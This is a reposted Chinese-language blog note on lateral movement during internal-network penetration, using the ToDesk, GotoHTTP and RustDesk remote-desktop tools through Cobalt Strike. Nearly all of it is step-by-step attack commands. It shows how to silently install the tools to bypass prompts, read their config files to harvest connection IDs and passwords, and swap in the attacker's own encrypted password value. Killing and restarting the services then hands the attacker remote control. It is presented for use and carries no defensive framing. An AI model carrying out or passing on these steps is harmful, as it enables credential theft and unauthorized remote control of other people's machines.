0


内网渗透ToDesk、GoToHTTP、RustDESK横向移动利用流程笔记

目录

关于向日葵的声名:

向日葵官方已经禁止有漏洞的版本连接服务器,所以这个向日葵横向已经失效,在这里就不多赘述了。

利用ToDesk横向移动:

ToDesk介绍:

ToDesk是一款类似向日葵

的远程控制软件,但比向日葵、TV和AD更为流畅和稳定,它同样具备着内网穿透、文件 传输、云端同步和流量加密等功能 有绿色精简版和全功能版两个版本,支持的系统有:Winodws/Linux/MacOS/Android/iOS

环境准备:

本机:windows10 靶机:server 2019

本机软件准备:cobaltstrike 、ToDesk 靶机软件准备:ToDesk

使用方法:

1.绕过首次安装弹窗

当我们首次打开todesk软件,必然会出现一个弹窗,如下图所示:

我们可以使用如下指令进行绕过:

cs: shell ToDesk1.exe /S                       //官方给的静默安装,可以到达绕过的效果
2.安装完成后自动运行,接下来查看配置文件

在 C:"Program Files (x86)"\ToDesk\ 的路径下会有一个config.ini文件,这个文件里面有着连接ToDesk的临时密码。我们使用如下指令进行查看:

cs: shell type C:\"Program Files (x86)"\ToDesk\config.ini   

注意:tempAuthPassEx里面的临时密码是经过加密的,可以进行解密,但不建议(会需要很长的时间)下面介绍一个更简单的方法。

3.解决tempAuthPassEx加密的问题:

1.在自己的机器上也安装一个Todesk软件

2.在本机上找到C:"Program Files (x86)"\ToDesk\config.ini 的文件

并将它的临时密码记录下来。

再将自己的tempAuthPassEx替换到靶机上的tempAuthPassEx,就可以知道靶机上的临时密码了。

步骤一:

把靶机的tempAuthPassEx替换成自己的tempAuthPassEx,这点很重要。在使用cs中的File Browse进行文件的替换

在对比一下tempAuthPassEx是否被换掉:

shell type C:\"Program Files (x86)"\ToDesk\config.ini  

步骤三:重启ToDesk即可

查找进程:

shell tasklist

删除ToDesk_Service.exe和ToDesk_Service.exe进程:

shell taskkill /pid 6696 /F
shell taskkill /pid 7764 /F

重启ToDesk:

shell C:\"Program Files (x86)"\ToDesk\ToDesk.exe

使用本机的临时密码登录即可。设备代码可以通过cs自带的VNC进行查看。

GoToHTTP横向移动:

介绍:

GotoHTTP工作在B2C模式。使用远程控制时,不必在每一台电脑上都安装远程软件。不管身处何处,有浏览器就能访问远程电脑。 即使公司网络管控,仍然可以控制或被控制。支持文件传输、无人值守、剪切板同步、远程语音、远程摄像头、多显示器支持

下载地址:GotoHTTP - Free Download

使用方法:

前提条件:
使用cs或者其他文件上传的工具,将exe文件上传到目标机器。

1.运行exe文件

命令:

shell dir C:\Users\Administrator\Desktop\GotoHTTP_x64

它会在该目录下生成一个gotohttp.ini的配置文件

2.查看gotohttp.ini配置文件

命令:

shell type C:\Users\Administrator\Desktop\gotohttp.ini

可以看到文件中的连接地址、账号、密码

3.使用浏览器进行连接:

GotoHTTP - 在线远程控制平台

注意:现在是需要付费的

利用RustDESK横向移动:

介绍:
远程桌面软件,开箱即用,无需要任何配置,完美替代了TeamViewer。可以完全掌控数据,不用担心安全的问题。

下载地址:

rustdesk: 远程桌面软件 (gitee.com)

使用方法:

前提:

使用cs或者其他文件上传的工具,将exe文件上传到目标机器。

1.运行该程序
cs:shell rustdesk.exe //注意路径
2.找到config配置文件

该文件位置在:C:\Users\Administrator\AppData\Roaming\RustDesk\config

命令:

shell dir C:\Users\Administrator\AppData\Roaming\RustDesk\config
3.查看文件:

命令:

shell type C:\Users\Administrator\AppData\Roaming\RustDesk\config\RustDesk.toml

但需要注意:第一次运行rustdesk是没有密码的

4.创建文件进行替换。该方法和ToDesk相似,可以进行参考

5.上传文件:

使用cs的File Browser进行替换

检查文件是否被更改:

命令:

shell type C:\Users\Administrator\AppData\Roaming\RustDesk\config\RustDesk.toml

​发现该文件的密码确实已被更改。

记住该文件中的id和password

6.重启rustdesk

查看进程:

shell tasklist

杀掉该进程:

shell taskkill /pid 7984 /F

再次启动restdesk程序:

shell rustdesk.exe  //注意路径

最后在本地进行连接即可

标签: 笔记

本文转载自: https://blog.csdn.net/m0_73062138/article/details/139535386
版权归原作者 RLG_星辰 所有, 如有侵权,请联系我们删除。

“内网渗透ToDesk、GoToHTTP、RustDESK横向移动利用流程笔记”的评论:

还没有评论